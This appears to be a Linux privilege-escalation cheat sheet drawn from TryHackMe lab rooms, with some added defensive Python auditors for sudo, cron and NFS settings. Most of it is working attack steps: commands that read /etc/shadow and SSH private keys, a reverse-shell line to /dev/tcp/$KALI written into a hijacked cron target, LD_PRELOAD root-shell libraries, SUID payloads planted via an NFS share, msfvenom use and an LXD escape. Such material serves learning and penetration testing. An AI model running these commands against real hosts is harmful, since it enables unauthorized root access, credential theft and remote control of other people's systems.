Linux
Gathering Info
whoami
id
groups
cat ~/.bash_history
uname -a
Check for passwords in environment variables
env
Find files
Files owned by your user
Victim
find / -user $USER 2>/dev/null
Files owned by group
Victim
find / -type f -group $GROUP 2>/dev/null
Find passwords
cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wp-config.php #WordPress sites
/home/user/myvpn.ovpn #VPN config. Look for auth-user-pass and read the file it points to.
find / -type f -name "*.bak" 2>/dev/null
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/null
Victim
cat ~/.bash_history | grep -i passw
SSH Keys
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa
Weak File Permissions
Readable /etc/shadow
Linux PrivEsc #Weak File Permissions - Readable /etc/shadow
Writable /etc/shadow
Linux PrivEsc #Weak File Permissions - Writable /etc/shadow
Writable /etc/passwd
Linux PrivEsc #Weak File Permissions - Writable /etc/passwd
Cron Jobs
Check whether you have permission to overwrite the contents of the file the job runs
Check whether the job uses a relative path rather than an absolute one, so the lookup can be redirected to a different file
Victim
cat /etc/crontab
Other places cron jobs may be defined
Victim
cat /etc/cron.d/*
Cron Jobs - File Permissions
Examples
Linux PrivEsc #Cron Jobs - File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
View the contents of the system-wide crontab.
Victim
cat /etc/crontab
There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.
Locate the full path of the overwrite.sh file.
Victim
locate overwrite.sh
Note that the file is world-writable.
Victim
ls -l /usr/local/bin/overwrite.sh
Cron Jobs - PATH Environment Variable
Examples
Linux PrivEsc #Cron Jobs - PATH Environment Variable
View the contents of the system-wide crontab
Victim
cat /etc/crontab
Note that the PATH variable starts with /home/user, which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents:

overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
Make sure that the file is executable:
Victim
chmod +x /home/user/overwrite.sh
Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:
Victim
/tmp/rootbash -p
Cron Jobs - Wildcards
Examples
Linux PrivEsc #Cron Jobs - Wildcards
View the contents of the other cron job script
Victim
cat /usr/local/bin/compress.sh
Note that the tar command is being run with a wildcard (*) in your home directory.
Sudo/SUID/Capabilities
Run all of these commands, then check https://gtfobins.github.io/ for the binaries found. The commands may give different results.
Check what can be run with NOPASSWD
Victim
sudo -l
vi
vim
find
python3
SUID / SGID Executables - Known Exploits
Find all the SUID/SGID executables.
Victim
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
SUID / SGID Executables - Shared Object Injection
Linux PrivEsc #SUID / SGID Executables - Shared Object Injection
SUID / SGID Executables - Environment Variables
Linux PrivEsc #SUID / SGID Executables - Environment Variables
SUID / SGID Executables - Abusing Shell Features
Linux PrivEsc #SUID / SGID Executables - Abusing Shell Features (#1)
Linux PrivEsc #SUID / SGID Executables - Abusing Shell Features (#2)
Sudo - Environment Variables
LD_LIBRARY_PATH
Examples
Linux PrivEsc #Sudo - Environment Variables
preload.c - code
#define _GNU_SOURCE   /* needed for the setresuid() declaration in unistd.h */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void hijack() __attribute__((constructor));
void hijack() {
    /* unset the variable before spawning bash, otherwise the new shell loads this library again */
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
library_path.c
#define _GNU_SOURCE   /* needed for the setresuid() declaration in unistd.h */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void hijack() __attribute__((constructor));
void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env_keep options):
Victim
sudo -l
LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Create a shared object using the code located at /home/user/tools/sudo/preload.c.
Victim
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
Run one of the programs you are allowed to run via sudo, with LD_PRELOAD set to the full path of the new shared object:
Victim
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp
A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.
Run ldd against the apache2 program file to see which shared libraries are used by the program.
Victim
ldd /usr/sbin/apache2
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.
Victim
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
Run apache2 via sudo with LD_LIBRARY_PATH set to /tmp, where the new shared object is located:
Victim
sudo LD_LIBRARY_PATH=/tmp apache2
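To check a host for this env_keep misconfiguration without exploiting it, the following Python (an added example, not part of the room or this page) parses saved `sudo -l` output and flags loader variables preserved by env_keep. The list of dangerous variables and the sample output are assumptions constructed for the example; the fix in sudoers is to remove the env_keep entries for those variables.

```python
import re

# Variables that let the caller load their own code into a process sudo runs as root.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "PYTHONPATH", "PERL5LIB", "BASH_ENV"}

def parse_sudo_l(text):
    """Return (defaults, rules): Defaults tokens and (runas, tags, command) rules."""
    defaults, rules, section = [], [], None
    for line in text.splitlines():
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
        elif "may run the following commands" in line:
            section = "rules"
        elif not line.strip():
            section = None
        elif section == "defaults":
            defaults += [t.strip() for t in line.split(",") if t.strip()]
        elif section == "rules":
            m = re.match(r"\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+)", line)
            if m:
                tags = m.group(2).replace(":", " ").split()
                rules.append((m.group(1).strip(), tags, m.group(3).strip()))
    return defaults, rules

def kept_env(defaults):
    """Variable names preserved by env_keep, including env_keep+="A B" forms."""
    kept = set()
    for tok in defaults:
        m = re.match(r'env_keep\s*\+?=\s*"?([^"]*)"?', tok)
        if m:
            kept.update(m.group(1).split())
    return kept

def audit_sudo_l(text):
    """Return finding strings for `sudo -l` output (empty list means clean)."""
    defaults, rules = parse_sudo_l(text)
    bad = sorted(kept_env(defaults) & DANGEROUS_ENV)
    if not bad:
        return []
    # Any permitted binary loads the caller's library as root, so rules present means HIGH.
    sev = "HIGH" if rules else "MEDIUM"
    return [f"{sev}: env_keep preserves {', '.join(bad)}; remove it from sudoers"]
# Constructed `sudo -l` output matching the configuration described above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
"""
```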
LD_PRELOAD
Examples
If LD_PRELOAD is in env_keep, compile the shared object below, then run the script or binary we can run with NOPASSWD under sudo with LD_PRELOAD pointing at it.

Victim
vi preload.c
preload.c - code
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Victim
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSE
Files with SUID-bit set
Victim
find / -perm -u=s -type f 2> /dev/null
setcap
If any binary has capabilities set, that is very interesting; check out the room for details. It could lead to privilege escalation.
Programs in strange locations
If there is a program running from a user's home directory or somewhere else unusual, it may be worth investigating.
Getcap
Victim
getcap -r / 2>/dev/null
python
If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
Service Exploits
PATH Variables
Examples
Hacker vs. Hacker
Common Linux Privesc #Exploiting Crontab
Look at the PATH. Below is an example of a cron job whose PATH lists /home/lachlan/bin before /bin and /usr/bin. Because the cron job does not call pkill by its full path, it is resolved from /home/lachlan/bin first, so a file named /home/lachlan/bin/pkill with whatever contents we choose will be run as root.
Victim
cat /etc/crontab
Other places cron jobs may be defined
Victim
cat /etc/cron.d/*
Victim(lachlan)
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x /home/lachlan/bin/pkill
Add path
Example
Common Linux Privesc #Exploiting PATH Variable
If a cron job does not specify the full path of a command, we may be able to redirect it to another file.
Before we change PATH, ls resolves to /bin/ls.

After running the command below, ls resolves to our script in /tmp instead.
Victim
export PATH=/tmp:$PATH
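From the defender's side, the weaknesses described in the two Cron Jobs sections above and in this PATH Variables section can be audited mechanically. The following Python is an added example written for this page (not the room's or the author's code): it parses a system crontab, flags user-controlled PATH entries and commands given by bare name, and flags a tar wildcard in a job script; the set of user-writable prefixes and the sample crontab are assumptions constructed for the example.

```python
import re

# Assumption for this example: an unprivileged user can write under these prefixes.
USER_WRITABLE = ("/home/", "/tmp", "/var/tmp", "/dev/shm")
BUILTINS = {"cd", "export", "test", "[", "true", "false"}  # never resolved via PATH

def parse_crontab(text):
    """Split a system crontab into (env, jobs); each job is (user, command)."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_]\w*)=(.*)$", line)
        if m:                                       # VAR=value line
            env[m.group(1)] = m.group(2).strip('"')
            continue
        nsched = 1 if line.startswith("@") else 5   # "@daily" vs. "m h dom mon dow"
        parts = line.split(None, nsched + 1)
        if len(parts) == nsched + 2:
            jobs.append((parts[nsched], parts[nsched + 1]))
    return env, jobs

def audit_crontab(text):
    """Return finding strings for a system crontab (empty list means clean)."""
    env, jobs = parse_crontab(text)
    # Relative or user-writable PATH entries let a user pick what a bare name runs as root.
    path = env.get("PATH", "/usr/bin:/bin")         # cron's default when PATH is unset
    risky = [d for d in path.split(":") if not d.startswith("/") or d.startswith(USER_WRITABLE)]
    findings = [f"PATH entry {d!r} is user-controlled" for d in risky]
    for user, command in jobs:
        for segment in re.split(r"&&|\|\||;|\|", command):   # each simple command
            words = segment.split()
            if not words or words[0] in BUILTINS or words[0].startswith("/"):
                continue
            sev = "HIGH" if risky else "MEDIUM"
            findings.append(f"{sev}: {user} job runs {words[0]!r} by bare name")
    return findings

def audit_script(text):
    """Flag tar run with an unquoted wildcard (file names get parsed as options)."""
    return [f"line {n}: tar with unquoted wildcard: {l.strip()!r}"
            for n, l in enumerate(text.splitlines(), 1)
            if re.search(r"^\s*tar\s.*\s\*(\s|$)", l)]
# Constructed sample crontab mirroring the room's two every-minute jobs.
SAMPLE_CRONTAB = """\
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
"""
```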
Passwords & Keys
History Files
Examples
Linux PrivEsc #Passwords & Keys - History Files
Victim
cat ~/.*history | less
Config Files
Examples
Linux PrivEsc #Passwords & Keys - Config Files
Victim
cat /home/user/myvpn.ovpn
SSH Keys
Copy keys from Victim
Examples
Linux PrivEsc #Passwords & Keys - SSH Keys
Look for hidden files & directories in the system root.
Victim
cat /home/$USER/.ssh/$KEY
Copy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.
Kali
chmod 600 $KEY
ssh -i $KEY -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa $USER@$VICTIM
Add Keys to Victim
Examples
Kali
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub 
Victim
echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keys
Kali
ssh $USER@$VICTIM
NFS
Examples
Linux PrivEsc #NFS
Linux Privilege Escalation
Linux PrivEsc Arena
Option #1
Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
Check the NFS share configuration on the Debian VM.
Victim
cat /etc/exports
no_root_squash is present

Note that the /tmp share has root squashing disabled.
On your Kali box, switch to your root user if you are not already running as root.
Kali
sudo su
Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).
Kali
mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfs
Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash).
Kali
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
Still using Kali's root user, make the file executable and set the SUID permission.
Kali
chmod +xs /tmp/nfs/shell.elf
Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell.
Victim
/tmp/shell.elf
Option #2
Victim
showmount -e $VICTIM
cat /etc/exports

Kali
mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c
nfc.c
#include <stdlib.h>
#include <unistd.h>
int main()
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
Kali
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc
Victim
cd /home/ubuntu/sharedfolder
./nfc
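Auditing this from the server side: the following Python is an added example (not the room's material or this page's author's code) that parses an /etc/exports file and flags shares exported with no_root_squash, shares writable by any host, and the insecure option; the sample exports file is constructed for the example. The fix is to drop no_root_squash so the default root_squash maps remote root to nobody.

```python
import re

def parse_exports(text):
    """Parse /etc/exports into (path, client, options) triples.

    A client written without a parenthesised list gets the exportfs defaults
    (ro, root_squash, ...), so it comes back with an empty option set."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.match(r"([^(]*)(?:\((.*)\))?$", spec)
            if not m:
                continue                            # malformed token, skip it
            client = m.group(1) or "*"              # "(opts)" alone applies to every host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Return finding strings for an exports file (empty list means clean)."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            # Remote root keeps uid 0, so files it creates are root-owned; with rw
            # that includes SUID binaries that local users of the server can execute.
            sev = "HIGH" if "rw" in opts else "MEDIUM"
            findings.append(f"{sev}: {path} exported to {client} with no_root_squash")
        if client in ("*", "0.0.0.0/0") and "rw" in opts:
            findings.append(f"MEDIUM: {path} is writable by any host")
        if "insecure" in opts:
            findings.append(f"LOW: {path} accepts requests from unprivileged source ports")
    return findings

# Constructed exports file mirroring the two shares used in Option #1 and Option #2.
SAMPLE_EXPORTS = """\
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder 10.0.0.0/24(rw,no_root_squash)
/srv/backups 10.0.0.5(ro)
"""
```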
Kernel Exploits
Examples
Linux PrivEsc #Kernel Exploits
Writable Files
Files that are group-writable, and files writable by the current user:
find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null
find / -writable 2>/dev/null
Ports
May be able to find open ports only accessible internally.
ss -ltp
netstat -tuan
LXD
Examples
Resources
https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
Note: the lxd init command below was needed to resolve a storage pool issue; it may not always be needed.
Victim
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
PolKit
Examples: Hip Flask
See if it exists.
Kali
apt list --upgradeable
Check out this room for more details
Monitor Processes
Examples
Victim
ps axf
PSPY
A tool that monitors Linux processes without root access.
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
Docker Breakout / Privilege Escalation
Examples
Copy Material from here:
https://tryhackme.com/room/linprivesc
Automated Enumeration Tools
LinPeas
Room with other things to try
https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc
Other Cheat sheets
https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics